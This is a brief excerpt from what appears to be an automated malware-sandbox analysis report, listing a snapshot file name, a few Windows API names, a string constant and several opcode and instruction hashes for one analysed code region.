                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_pjthjsdjgjrtavv.jbxd
                                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                • API ID: SystemTimelstrcpylstrlen
                                                                                                                                                                                                                                                                                • String ID: ABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890
                                                                                                                                                                                                                                                                                • API String ID: 3844799746-2529986050
                                                                                                                                                                                                                                                                                • Opcode ID: 066908f056dc1f1dbb91ebc683ebbcf5ffb8e290bff7efcc6e8575583ae2dc61
                                                                                                                                                                                                                                                                                • Instruction ID: 0ad9b0325b1aa92503a801a233b5e7783d800f0c675173fcafeea2b792c599d4
                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 066908f056dc1f1dbb91ebc683ebbcf5ffb8e290bff7efcc6e8575583ae2dc61
                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 0F110330304200ABC704AB76A81667FB7A7EBC5304F45507EF442C73A1DE389C8087A5